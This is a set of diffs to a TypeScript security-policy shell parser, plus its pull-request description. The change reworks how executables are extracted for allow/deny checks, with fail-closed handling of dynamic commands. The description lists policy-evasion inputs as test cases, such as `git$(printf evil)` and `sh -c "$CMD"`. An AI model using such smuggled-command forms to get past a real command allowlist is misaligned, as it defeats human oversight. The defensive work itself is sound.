+  return /^[A-Za-z_][A-Za-z0-9_]*=/.test(token);
+}
+
 /**
  * Extract all executable names from a shell command string.
  *
@@ -28,8 +369,9 @@ export interface ParsedCommand {
  * - Pipelines: `cat file | grep pattern`
  * - Shell wrappers: `sh -c 'git commit -m "msg"'`
  * - Logical operators: `npm test && npm run build`
+ * - Multi-line blocks: each newline-separated statement parsed independently
  * - Subshells: `(cd dir && make)`
- * - Redirections: `echo hello > file.txt`
+ * - Redirections: `echo hello > file.txt` — redirect target is never an executable
  *
  * @param command - The shell command string to parse
  * @returns Array of parsed commands with executable names
@@ -48,121 +390,63 @@ export interface ParsedCommand {
  */
 export function extractCommands(command: string): ParsedCommand[] {
   const commands: ParsedCommand[] = [];
+  const tokens = tokenize(command);
 
-  try {
-    const parsed = parse(command);
-    const currentCommand: string[] = [];
-    let skipNext = false;
+  let stmtWords: string[] = [];
+  let skipNextWord = false;
 
-    for (let i = 0; i < parsed.length; i++) {
-      const token = parsed[i];
+  const flushStatement = (): void => {
+    const words = stmtWords;
+    stmtWords = [];
+    skipNextWord = false;
 
-      // Skip argument to -c flag
-      if (skipNext) {
-        skipNext = false;
-        // The -c argument is itself a command string, parse it recursively
-        if (typeof token === 'string') {
-          const nestedCommands = extractCommands(token);
-          commands.push(...nestedCommands);
+    if (words.length === 0) return;
+
+    // Skip leading KEY=VALUE assignments to find the actual executable
+    let execIdx = 0;
+    while (execIdx < words.length && isEnvAssignment(words[execIdx])) execIdx++;
+    if (execIdx >= words.length) return;
+
+    const executable = path.basename(words[execIdx]);
+    if (!executable) return;
+
+    // sh -c detection: recursively parse the -c argument
+    if (SHELLS.has(executable)) {
+      let dashCIdx = -1;
+      for (let k = 0; k < words.length; k++) {
+        if (words[k] === '-c') {
+          dashCIdx = k;
+          break;
         }
-        continue;
       }
-
-      // Handle operators (pipe, logical, etc.)
-      if (typeof token === 'object' && 'op' in token) {
-        // Flush current command
-        if (currentCommand.length > 0) {
-          const cmd = buildCommand(currentCommand);
-          if (cmd) commands.push(cmd);
-          currentCommand.length = 0;
-        }
-        continue;
-      }
-
-      // Handle string tokens
-      if (typeof token === 'string') {
-        // Check for shell invocation with -c flag
-        if (isShellInvocation(token) && i + 1 < parsed.length) {
-          const nextToken = parsed[i + 1];
-          if (typeof nextToken === 'string' && nextToken === '-c') {
-            // Skip 'sh' and '-c', mark to parse the command argument
-            skipNext = true;
-            i++; // Skip -c
-            continue;
-          }
-        }
-
-        currentCommand.push(token);
+      if (dashCIdx >= 0 && dashCIdx + 1 < words.length) {
+        const nested = extractCommands(words[dashCIdx + 1]);
+        commands.push(...nested);
+        return;
       }
     }
 
-    // Flush remaining command
-    if (currentCommand.length > 0) {
-      const cmd = buildCommand(currentCommand);
-      if (cmd) commands.push(cmd);
-    }
-  } catch {
-    // If shell-quote fails to parse, treat the whole thing as a single command
-    const firstWord = command.trim().split(/\s+/)[0];
-    if (firstWord) {
-      commands.push({
-        executable: path.basename(firstWord),
-        original: command,
-      });
+    commands.push({ executable, original: words.join(' ') });
+  };
+
+  for (const tok of tokens) {
+    if (tok.kind === 'op') {
+      flushStatement();
+    } else if (tok.kind === 'redir') {
+      // Next word is a redirect target — skip it, it is not an executable
+      skipNextWord = true;
+    } else {
+      // word token
+      if (skipNextWord) {
+        skipNextWord = false;
+      } else {
+        stmtWords.push(tok.value);
+      }
     }
   }
+  flushStatement();
 
   return commands;
-}
-
-/**
- * Check if a token is an environment variable assignment (KEY=VALUE).
- *
- * @param token - Token to check
- * @returns True if token matches KEY=VALUE pattern
- */
-function isEnvAssignment(token: string): boolean {
-  // Match KEY=VALUE where KEY is a valid env var name (alphanumeric + underscore, not starting with digit)
-  return /^[A-Za-z_][A-Za-z0-9_]*=/.test(token);
-}
-
-/**
- * Build a ParsedCommand from an array of tokens.
- *
- * Skips leading environment variable assignments (KEY=VALUE) to find the actual executable.
- * For example, `NODE_ENV=production node app.js` extracts `node` as the executable.
- *
- * @param tokens - Array of command tokens
- * @returns ParsedCommand or null if tokens are empty or only contain env assignments
- */
-function buildCommand(tokens: string[]): ParsedCommand | null {
-  if (tokens.length === 0) return null;
-
-  // Skip leading KEY=VALUE environment assignments to find the actual executable
-  let executableIndex = 0;
-  while (executableIndex < tokens.length && isEnvAssignment(tokens[executableIndex])) {
-    executableIndex++;
-  }
-
-  // If all tokens are env assignments, no executable found
-  if (executableIndex >= tokens.length) return null;
-
-  const executable = path.basename(tokens[executableIndex]);
-  const original = tokens.join(' ');
-
-  return { executable, original };
-}
-
-/**
- * Check if a token is a shell invocation (sh, bash, zsh, etc.).
- *
- * @param token - Token to check
- * @returns True if token is a shell executable name
- */
-function isShellInvocation(token: string): boolean {
-  const shells = ['sh', 'bash', 'zsh', 'ksh', 'dash', 'fish', 'csh', 'tcsh'];
-  const basename = path.basename(token);
-  return shells.includes(basename);
 }
 
 /**
@@ -186,6 +470,9 @@ export function extractPrimaryExecutable(command: string): string | null {
 
 /**
  * Get all unique executable names from a command string.
+ *
+ * Combines direct command extraction with recursive scanning of command
+ * substitutions ($(...) and backticks) to find all programs that will run.
  *
  * @param command - The shell command string to parse
  * @param depth - Internal recursion depth to prevent infinite loops (max 5)

--- a/packages/core/src/policy/parser.ts
+++ b/packages/core/src/policy/parser.ts
@@ -70,20 +70,27 @@ function isOddBackslashEscaped(command: string, index: number, floor: number): b
   return bs % 2 === 1;
 }
 
-function isShellCommentStart(line: string, index: number): boolean {
-  if (line[index] !== '#' || isOddBackslashEscaped(line, index, 0)) return false;
-  if (index === 0) return true;
+function isShellCommentStart(command: string, index: number, floor = 0): boolean {
+  if (command[index] !== '#' || isOddBackslashEscaped(command, index, floor)) return false;
+  if (index <= floor) return true;
 
-  const previous = line[index - 1];
+  const previous = command[index - 1];
   return (
     previous === ' ' ||
     previous === '\t' ||
+    previous === '\n' ||
     previous === ';' ||
     previous === '&' ||
     previous === '|' ||
     previous === '(' ||
     previous === ')'
   );
+}
+
+function skipShellComment(command: string, startIdx: number): number {
+  let i = startIdx;
+  while (i < command.length && command[i] !== '\n') i++;
+  return i;
 }
 
 /**
@@ -128,6 +135,9 @@ function scanSubst(command: string, startIdx: number): number {
         if (ch === '(') level++;
         else level--;
       }
+    } else if (isShellCommentStart(command, i, startIdx)) {
+      i = skipShellComment(command, i);
+      continue;
     }
     i++;
   }
@@ -300,12 +310,40 @@ function stripHeredocBodies(command: string): string {
  */
 function scanBacktick(command: string, startIdx: number): number {
   let i = startIdx;
+  let state: 'normal' | 'single' | 'double' = 'normal';
+
   while (i < command.length) {
-    if (command[i] === '\\') {
+    const ch = command[i];
+
+    if (state === 'single') {
+      if (ch === "'") state = 'normal';
+      i++;
+      continue;
+    }
+
+    if (state === 'double') {
+      if (ch === '"' && !isOddBackslashEscaped(command, i, startIdx)) {
+        state = 'normal';
+      }
+      i++;
+      continue;
+    }
+
+    if (ch === '\\') {
       i += 2;
       continue;
     }
-    if (command[i] === '`') return i + 1;
+    if (isShellCommentStart(command, i, startIdx)) {
+      i = skipShellComment(command, i);
+      continue;
+    }
+    if (ch === "'" && !isOddBackslashEscaped(command, i, startIdx)) {
+      state = 'single';
+    } else if (ch === '"' && !isOddBackslashEscaped(command, i, startIdx)) {
+      state = 'double';
+    } else if (ch === '`') {
+      return i + 1;
+    }
     i++;
   }
   return -1;

--- a/packages/core/src/policy/parser.ts
+++ b/packages/core/src/policy/parser.ts
@@ -184,6 +184,14 @@ function extractHeredocDelimiters(line: string): HeredocDelimiter[] {
       if (delimiterQuote === '"') {
         if (current === '"' && !isOddBackslashEscaped(line, i, 0)) {
           delimiterQuote = null;
+        } else if (current === '\\') {
+          const next = line[i + 1];
+          if (next === '"' || next === '\\' || next === '$' || next === '`') {
+            delimiter += next;
+            i += 2;
+            continue;
+          }
+          delimiter += current;
         } else {
           delimiter += current;
         }
@@ -201,6 +209,15 @@ function extractHeredocDelimiters(line: string): HeredocDelimiter[] {
         delimiterQuote = '"';
         i++;
         continue;
+      }
+
+      if (current === '\\') {
+        const next = line[i + 1];
+        if (next !== undefined) {
+          delimiter += next;
+          i += 2;
+          continue;
+        }
       }
 
       if (
@@ -469,6 +486,16 @@ function tokenize(command: string): Token[] {
       i += 2;
       continue;
     }
+    if ((ch === '>' && (next === '&' || next === '|')) || (ch === '<' && next === '&')) {
+      if (/^\d+$/.test(wordBuf)) {
+        wordBuf = '';
+      } else {
+        flushWord();
+      }
+      tokens.push({ kind: 'redir' });
+      i += 2;
+      continue;
+    }
     if (ch === '>' && next === '>') {
       if (/^\d+$/.test(wordBuf)) {
         wordBuf = '';
@@ -584,6 +611,7 @@ function isEnvAssignment(token: string): boolean {
  *
  * extractCommands('sh -c "npm test && npm run build"')
  * // => [
+ * //   { executable: 'sh', original: 'sh -c npm test && npm run build' },
  * //   { executable: 'npm', original: 'npm test' },
  * //   { executable: 'npm', original: 'npm run build' }
  * // ]
@@ -622,10 +650,12 @@ export function extractCommands(command: string): ParsedCommand[] {
       return;
     }
 
+    const original = words.map((w) => w.value).join(' ');
     const executable = path.basename(firstWord.value);
     if (!executable) return;
 
-    // sh -c detection: recursively parse the -c argument
+    // sh -c detection: keep the wrapper executable and recursively parse the
+    // -c script so policies must allow both the shell and nested commands.
     if (SHELLS.has(executable)) {
       let dashCIdx = -1;
       for (let k = 0; k < words.length; k++) {
@@ -635,13 +665,22 @@ export function extractCommands(command: string): ParsedCommand[] {
         }
       }
       if (dashCIdx >= 0 && dashCIdx + 1 < words.length) {
-        const nested = extractCommands(words[dashCIdx + 1].value);
+        commands.push({ executable, original });
+        const scriptWord = words[dashCIdx + 1];
+        if (scriptWord.dynamic) {
+          commands.push({
+            executable: DYNAMIC_EXECUTABLE_SENTINEL,
+            original: scriptWord.value,
+          });
+          return;
+        }
+        const nested = extractCommands(scriptWord.value);
         commands.push(...nested);
         return;
       }
     }
 
-    commands.push({ executable, original: words.map((w) => w.value).join(' ') });
+    commands.push({ executable, original });
   };
 
   for (const tok of tokens) {
@@ -675,7 +714,7 @@ export function extractCommands(command: string): ParsedCommand[] {
  * @example
  * ```typescript
  * extractPrimaryExecutable('git status')  // => 'git'
- * extractPrimaryExecutable('sh -c "npm test"')  // => 'npm'
+ * extractPrimaryExecutable('sh -c "npm test"')  // => 'sh'
  * ```
  */
 export function extractPrimaryExecutable(command: string): string | null {

--- a/packages/core/src/policy/parser.ts
+++ b/packages/core/src/policy/parser.ts
@@ -36,6 +36,7 @@ type OpToken = { kind: 'op' };
 /** Redir token — a redirect operator that is NOT a statement boundary: > >> < << */
 type RedirToken = { kind: 'redir' };
 type Token = WordToken | OpToken | RedirToken;
+type HeredocDelimiter = { value: string; stripLeadingTabs: boolean };
 
 /** Shell executable names for sh -c wrapper detection. */
 const SHELLS = new Set(['sh', 'bash', 'zsh', 'ksh', 'dash', 'fish', 'csh', 'tcsh']);
@@ -51,6 +52,25 @@ const SHELLS = new Set(['sh', 'bash', 'zsh', 'ksh', 'dash', 'fish', 'csh', 'tcsh
 export const DYNAMIC_EXECUTABLE_SENTINEL = '\x00<dynamic>';
 
 /**
+ * Check whether the character at index is escaped by an odd-length backslash
+ * run within the current scanning range.
+ *
+ * @param command - Full command string
+ * @param index - Character index to inspect
+ * @param floor - Lowest index that can contribute escaping backslashes
+ * @returns True when an odd number of backslashes immediately precedes index
+ */
+function isOddBackslashEscaped(command: string, index: number, floor: number): boolean {
+  let bs = 0;
+  let k = index - 1;
+  while (k >= floor && command[k] === '\\') {
+    bs++;
+    k--;
+  }
+  return bs % 2 === 1;
+}
+
+/**
  * Advance past a balanced $(...) block.
  *
  * startIdx is the position immediately after the opening '(' in '$('. Uses the
@@ -64,16 +84,31 @@ export const DYNAMIC_EXECUTABLE_SENTINEL = '\x00<dynamic>';
 function scanSubst(command: string, startIdx: number): number {
   let level = 1;
   let i = startIdx;
+  let state: 'normal' | 'single' | 'double' = 'normal';
+
   while (i < command.length && level > 0) {
     const ch = command[i];
-    if (ch === '(' || ch === ')') {
-      let bs = 0;
-      let k = i - 1;
-      while (k >= startIdx && command[k] === '\\') {
-        bs++;
-        k--;
+
+    if (state === 'single') {
+      if (ch === "'") state = 'normal';
+      i++;
+      continue;
+    }
+
+    if (state === 'double') {
+      if (ch === '"' && !isOddBackslashEscaped(command, i, startIdx)) {
+        state = 'normal';
       }
-      if (bs % 2 === 0) {
+      i++;
+      continue;
+    }
+
+    if (ch === "'" && !isOddBackslashEscaped(command, i, startIdx)) {
+      state = 'single';
+    } else if (ch === '"' && !isOddBackslashEscaped(command, i, startIdx)) {
+      state = 'double';
+    } else if (ch === '(' || ch === ')') {
+      if (!isOddBackslashEscaped(command, i, startIdx)) {
         if (ch === '(') level++;
         else level--;
       }
@@ -81,6 +116,143 @@ function scanSubst(command: string, startIdx: number): number {
     i++;
   }
   return level === 0 ? i : -1;
+}
+
+/**
+ * Parse heredoc delimiter words from a command line.
+ *
+ * This intentionally covers the common heredoc forms the policy parser needs
+ * to suppress safely: `<<EOF`, `<< EOF`, `<<'EOF'`, `<<"EOF"`, and `<<-EOF`.
+ *
+ * @param line - A single command line
+ * @returns Heredoc delimiters in the order their bodies will appear
+ */
+function extractHeredocDelimiters(line: string): HeredocDelimiter[] {
+  const delimiters: HeredocDelimiter[] = [];
+  let state: 'normal' | 'single' | 'double' = 'normal';
+  let i = 0;
+
+  while (i < line.length) {
+    const ch = line[i];
+
+    if (state === 'single') {
+      if (ch === "'") state = 'normal';
+      i++;
+      continue;
+    }
+
+    if (state === 'double') {
+      if (ch === '"' && !isOddBackslashEscaped(line, i, 0)) state = 'normal';
+      i++;
+      continue;
+    }
+
+    if (ch === "'" && !isOddBackslashEscaped(line, i, 0)) {
+      state = 'single';
+      i++;
+      continue;
+    }
+
+    if (ch === '"' && !isOddBackslashEscaped(line, i, 0)) {
+      state = 'double';
+      i++;
+      continue;
+    }
+
+    if (ch !== '<' || line[i + 1] !== '<' || line[i + 2] === '<') {
+      i++;
+      continue;
+    }
+
+    i += 2;
+    const stripLeadingTabs = line[i] === '-';
+    if (stripLeadingTabs) i++;
+    while (i < line.length && (line[i] === ' ' || line[i] === '\t')) i++;
+
+    let delimiter = '';
+    let delimiterQuote: "'" | '"' | null = null;
+    while (i < line.length) {
+      const current = line[i];
+
+      if (delimiterQuote === "'") {
+        if (current === "'") delimiterQuote = null;
+        else delimiter += current;
+        i++;
+        continue;
+      }
+
+      if (delimiterQuote === '"') {
+        if (current === '"' && !isOddBackslashEscaped(line, i, 0)) {
+          delimiterQuote = null;
+        } else {
+          delimiter += current;
+        }
+        i++;
+        continue;
+      }
+
+      if (current === "'") {
+        delimiterQuote = "'";
+        i++;
+        continue;
+      }
+
+      if (current === '"' && !isOddBackslashEscaped(line, i, 0)) {
+        delimiterQuote = '"';
+        i++;
+        continue;
+      }
+
+      if (
+        current === ' ' ||
+        current === '\t' ||
+        current === ';' ||
+        current === '&' ||
+        current === '|'
+      ) {
+        break;
+      }
+
+      delimiter += current;
+      i++;
+    }
+
+    if (delimiter.length > 0) delimiters.push({ value: delimiter, stripLeadingTabs });
+  }
+
+  return delimiters;
+}
+
+/**
+ * Remove heredoc body and terminator lines before command extraction.
+ *
+ * Heredoc bodies are data, not executable shell source. Keeping the initiating
+ * line preserves the command that consumes the heredoc while preventing body
+ * text and terminators from becoming phantom commands.
+ *
+ * @param command - Shell command string
+ * @returns Command with heredoc body and terminator lines omitted
+ */
+function stripHeredocBodies(command: string): string {
+  const lines = command.split('\n');
+  const kept: string[] = [];
+  const pendingDelimiters: HeredocDelimiter[] = [];
+
+  for (const line of lines) {
+    if (pendingDelimiters.length > 0) {
+      const terminator = pendingDelimiters[0];
+      const terminatorLine = terminator.stripLeadingTabs ? line.replace(/^\t+/, '') : line;
+      if (terminatorLine === terminator.value) {
+        pendingDelimiters.shift();
+      }
+      continue;
+    }
+
+    kept.push(line);
+    pendingDelimiters.push(...extractHeredocDelimiters(line));
+  }
+
+  return kept.join('\n');
 }
 
 /**
@@ -195,9 +367,12 @@ function tokenize(command: string): Token[] {
           // $(…) inside double-quote: word value is now unknowable at parse time
           wordIsDynamic = true;
           const end = scanSubst(command, i + 2);
-          i = end < 0 ? i + 2 : end;
+          i = end < 0 ? command.length : end;
         } else if (/[\w{]/.test(next)) {
-          // Skip $VAR inside double-quote — no expansion, no empty token
+          // Runtime parameter expansion can form the executable word. Preserve a
+          // dynamic token so command position stays fail-closed, while argument
+          // position remains harmless.
+          wordIsDynamic = true;
           i = scanVar(command, i + 1);
         } else {
           wordBuf += ch;
@@ -252,9 +427,12 @@ function tokenize(command: string): Token[] {
         // the entire token (prefix + substitution + any suffix) is dynamic.
         wordIsDynamic = true;
         const end = scanSubst(command, i + 2);
-        i = end < 0 ? i + 2 : end;
+        i = end < 0 ? command.length : end;
       } else if (/[\w{]/.test(next)) {
-        // $VAR reference — skip entirely, produces no token
+        // Runtime parameter expansion can form the executable word. Preserve a
+        // dynamic token so command position stays fail-closed, while argument
+        // position remains harmless.
+        wordIsDynamic = true;
         i = scanVar(command, i + 1);
       } else {
         wordBuf += ch;
@@ -413,7 +591,8 @@ function isEnvAssignment(token: string): boolean {
  */
 export function extractCommands(command: string): ParsedCommand[] {
   const commands: ParsedCommand[] = [];
-  const tokens = tokenize(command);
+  const normalizedCommand = stripHeredocBodies(command);
+  const tokens = tokenize(normalizedCommand);
 
   let stmtTokens: WordToken[] = [];
   let skipNextWord = false;
@@ -544,7 +723,7 @@ export function extractAllExecutables(command: string, depth = 0): string[] {
  */
 export function extractBacktickCommands(command: string, depth = 0): string[] {
   const backtickRegex = /`(.+?)`/g;
-  return extractRecursiveMatches(command, backtickRegex, depth);
+  return extractRecursiveMatches(stripHeredocBodies(command), backtickRegex, depth);
 }
 
 /**
@@ -562,37 +741,24 @@ export function extractDollarSubstitutions(command: string, depth = 0): string[]
   // Use balanced parenthesis counting instead of regex to avoid ReDoS
   // and correctly handle nested $(...) substitutions
   const executables: string[] = [];
+  const normalizedCommand = stripHeredocBodies(command);
   let i = 0;
-  while (i < command.length - 1) {
+  while (i < normalizedCommand.length - 1) {
     // Match $( but not $$( — double-dollar is PID expansion, not command substitution.
     // Note: $((...)) arithmetic and $(...) inside single quotes are conservatively
     // detected as substitutions, producing safe false positives.
-    if (command[i] === '$' && command[i + 1] === '(' && (i === 0 || command[i - 1] !== '$')) {
-      let level = 1;
-      let j = i + 2;
-      while (j < command.length && level > 0) {
-        if (command[j] === '(' || command[j] === ')') {
-          // Count preceding backslashes to detect escaped parentheses
-          let bs = 0;
-          let k = j - 1;
-          while (k >= i + 2 && command[k] === '\\') {
-            bs++;
-            k--;
-          }
-          if (bs % 2 === 0) {
-            // Unescaped parenthesis
-            if (command[j] === '(') level++;
-            else level--;
-          }
-        }
-        j++;
-      }
-      if (level === 0) {
-        const nestedContent = command.slice(i + 2, j - 1);
+    if (
+      normalizedCommand[i] === '$' &&
+      normalizedCommand[i + 1] === '(' &&
+      (i === 0 || normalizedCommand[i - 1] !== '$')
+    ) {
+      const end = scanSubst(normalizedCommand, i + 2);
+      if (end >= 0) {
+        const nestedContent = normalizedCommand.slice(i + 2, end - 1);
         // Recursively extract executables from the substitution content
         const nestedExecutables = extractAllExecutables(nestedContent, depth);
         executables.push(...nestedExecutables);
-        i = j;
+        i = end;
         continue;
       }
     }

--- a/packages/core/src/policy/parser.ts
+++ b/packages/core/src/policy/parser.ts
@@ -211,13 +211,10 @@ function extractHeredocDelimiters(line: string): HeredocDelimiter[] {
         continue;
       }
 
-      if (current === '\\') {
-        const next = line[i + 1];
-        if (next !== undefined) {
-          delimiter += next;
-          i += 2;
-          continue;
-        }
+      if (current === '\\' && i + 1 < line.length) {
+        delimiter += line[i + 1];
+        i += 2;
+        continue;
       }
 
       if (

--- a/packages/core/src/policy/parser.ts
+++ b/packages/core/src/policy/parser.ts
@@ -70,6 +70,22 @@ function isOddBackslashEscaped(command: string, index: number, floor: number): b
   return bs % 2 === 1;
 }
 
+function isShellCommentStart(line: string, index: number): boolean {
+  if (line[index] !== '#' || isOddBackslashEscaped(line, index, 0)) return false;
+  if (index === 0) return true;
+
+  const previous = line[index - 1];
+  return (
+    previous === ' ' ||
+    previous === '\t' ||
+    previous === ';' ||
+    previous === '&' ||
+    previous === '|' ||
+    previous === '(' ||
+    previous === ')'
+  );
+}
+
 /**
  * Advance past a balanced $(...) block.
  *
@@ -159,6 +175,8 @@ function extractHeredocDelimiters(line: string): HeredocDelimiter[] {
       continue;
     }
 
+    if (isShellCommentStart(line, i)) break;
+
     if (ch !== '<' || line[i + 1] !== '<' || line[i + 2] === '<') {
       i++;
       continue;
@@ -222,7 +240,11 @@ function extractHeredocDelimiters(line: string): HeredocDelimiter[] {
         current === '\t' ||
         current === ';' ||
         current === '&' ||
-        current === '|'
+        current === '|' ||
+        current === '<' ||
+        current === '>' ||
+        current === '(' ||
+        current === ')'
       ) {
         break;
       }
@@ -758,8 +780,25 @@ export function extractAllExecutables(command: string, depth = 0): string[] {
  * @returns Array of executable names found inside backticks
  */
 export function extractBacktickCommands(command: string, depth = 0): string[] {
-  const backtickRegex = /`(.+?)`/g;
-  return extractRecursiveMatches(stripHeredocBodies(command), backtickRegex, depth);
+  const executables: string[] = [];
+  const normalizedCommand = stripHeredocBodies(command);
+  let i = 0;
+
+  while (i < normalizedCommand.length) {
+    if (normalizedCommand[i] === '`') {
+      const end = scanBacktick(normalizedCommand, i + 1);
+      if (end >= 0) {
+        const nestedContent = normalizedCommand.slice(i + 1, end - 1);
+        const nestedExecutables = extractAllExecutables(nestedContent, depth);
+        executables.push(...nestedExecutables);
+        i = end;
+        continue;
+      }
+    }
+    i++;
+  }
+
+  return executables;
 }
 
 /**
@@ -800,30 +839,5 @@ export function extractDollarSubstitutions(command: string, depth = 0): string[]
     }
     i++;
   }
-  return executables;
-}
-
-/**
- * Helper to extract and recursively parse commands from regex matches.
- *
- * @param command - Command string to scan
- * @param regex - Regex with one capturing group for the nested command
- * @param depth - Current recursion depth
- * @returns Array of executable names
- */
-function extractRecursiveMatches(command: string, regex: RegExp, depth: number): string[] {
-  const executables: string[] = [];
-  let match: RegExpExecArray | null = null;
-
-  // Reset regex index for safety if it has the global flag
-  if (regex.global) regex.lastIndex = 0;
-
-  // biome-ignore lint/suspicious/noAssignInExpressions: idiomatic regex loop
-  while ((match = regex.exec(command)) !== null) {
-    const nestedContent = match[1];
-    const nestedExecutables = extractAllExecutables(nestedContent, depth);
-    executables.push(...nestedExecutables);
-  }
-
   return executables;
 }


### PR DESCRIPTION
# Summary

Refactor the security policy shell parser so command allow/deny checks no longer depend on `shell-quote` for executable extraction. The new tokenizer is purpose-built for policy evaluation and treats runtime-dependent command words conservatively.

## What Changed

- Replaced `shell-quote` executable extraction with a character-level parser for command words, operators, redirects, heredocs, substitutions, and shell wrappers.
- Added fail-closed handling for executable words that contain runtime substitutions such as `git$(...)`, backtick substitutions, `$CMD`, and `git${SUFFIX}`.
- Fixed redirect handling so redirect targets and file descriptor operations are not treated as executables.
- Fixed heredoc handling so heredoc body lines and terminators are data, not executable shell source.
- Preserved shell wrapper executables such as `sh` in `sh -c "..."` while still checking nested commands.
- Documented the updated allow/deny behavior in the security policy docs.

## Security Notes

- Dynamic executable words are emitted as an internal sentinel that cannot match a real allowlist entry, so they are denied unless trust mode is enabled.
- Command substitutions are still recursively scanned, so nested executables such as `printf` in `git$(printf evil)` are checked.
- Shell wrappers now require both the wrapper executable and nested commands to be allowed.
- Heredocs and redirect targets are suppressed only as shell data locations; command extraction resumes after heredoc terminators.

## Testing

- [x] `npm test -w packages/core -- parser.test.ts evaluator.test.ts`
- [x] `npm run test:property -w packages/core`
- [x] `npm run check:types -w packages/core`
- [x] `npm run check:lint:typed`
- [x] `npm test -w packages/core`
- [x] `npx biome check --formatter-enabled=true --linter-enabled=false packages/core/src/policy/parser.ts packages/core/__tests__/policy/parser.test.ts packages/core/__tests__/policy/evaluator.test.ts`

Targeted regression coverage includes:

- embedded substitutions in executable words
- parameter-expanded executable words
- quoted parentheses inside command substitutions
- heredoc body suppression and command extraction after heredoc terminators
- backslash-quoted heredoc delimiters
- ignored heredoc markers inside shell comments
- heredoc delimiters followed by shell metacharacters such as `>`
- `>&`, `<&`, and `>|` redirection operators
- shell wrapper preservation for `sh -c`
- dynamic shell wrapper scripts such as `sh -c "$CMD"`
- multiline backtick substitutions

## Review Notes

- [ ] `npm run verify`
- [ ] Public CLI behavior changed; docs and JSON schema output were checked.
- [ ] Runbook syntax or parser behavior changed; `docs/SPEC.md`, `docs/FORMAT.md`, and runbook fixtures were checked.
- [ ] Persisted runbook state changed; stale-state handling follows the no-migration rule.
- [x] Security policy, sandbox, path resolution, or command execution changed; traversal, symlink escape, deny precedence, env leakage, and fail-closed behavior were checked.
- [ ] GitHub Actions changed; actions remain SHA-pinned with version comments.


<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

## Release Notes

* **Improvements**
  * Enhanced command parsing to properly handle complex shell syntax including pipelines, redirects, command substitutions, and here-documents.
  * Improved detection of dynamic executables to ensure they fail safely in deny-run policies.

* **Documentation**
  * Updated security documentation to clarify command parsing behavior and dynamic executable handling.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->